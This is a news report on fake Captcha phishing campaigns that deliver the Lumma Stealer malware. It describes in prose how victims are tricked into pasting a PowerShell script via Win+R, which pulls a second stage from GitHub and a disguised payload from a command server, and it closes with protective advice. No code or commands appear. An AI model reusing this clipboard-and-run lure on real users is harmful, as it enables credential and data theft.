An alarming increase in malware distribution attempts through fake Captcha campaigns has caught the attention of cybersecurity experts, with over 1.4 million users falling victim to these malicious activities in the past month.
The primary payload being distributed in these campaigns is the Lumma Stealer malware, a dangerous tool designed for data theft. Cybercriminals are using phishing emails, such as the recent impersonation of the GitHub Security Team, to trick unsuspecting users into visiting malicious websites hosting these malicious Captcha campaigns.
Once users click on the malicious links in these phishing emails, they are directed to fake Captcha screens that deceive them into copying a malicious script to their clipboard. This script, when executed through instructions provided on the screen, typically involving the Win+R prompt or command line, installs malware on the user’s system, putting their personal information and system security at risk.
The malicious PowerShell script, which is the core of these attacks, tricks users into copying the script to their clipboard through a JavaScript-enabled button. Once executed, the script connects to a remote command-and-control server to download either the Lumma Stealer malware or an intermediary loader that ultimately drops the stealer onto the victim’s system.
The objective of the script is to steal sensitive information from the compromised machine. It downloads a secondary PowerShell script from a GitHub repository, which communicates with a command-and-control server to retrieve the final Lumma Stealer payload disguised as a legitimate application named SysSetup.exe. Upon execution, this payload may leave user data and system functions vulnerable to security breaches.
Recent data has shown a significant increase in fake Captcha campaigns, with countries like Italy, Argentina, France, Spain, and Brazil being hit the hardest. Millions of unique users worldwide have been targeted by these attacks over the past four weeks, underscoring the global impact of these malicious activities and the urgent need for effective countermeasures.
The Indicators of Compromise (IoCs) provided shed light on the modus operandi of the malicious campaign using a GitHub-based command-and-control server and a PowerShell script to deploy the Lumma Stealer malware. To stay protected against such threats, experts advise users to be cautious of unsolicited emails, avoid executing unknown scripts, enable two-factor authentication, and use reputable antivirus solutions to detect and prevent malware infections.
As the threat of fake Captcha attacks continues to grow, it is crucial for individuals and organizations to stay vigilant and implement robust cybersecurity measures to safeguard their data and systems from malicious actors.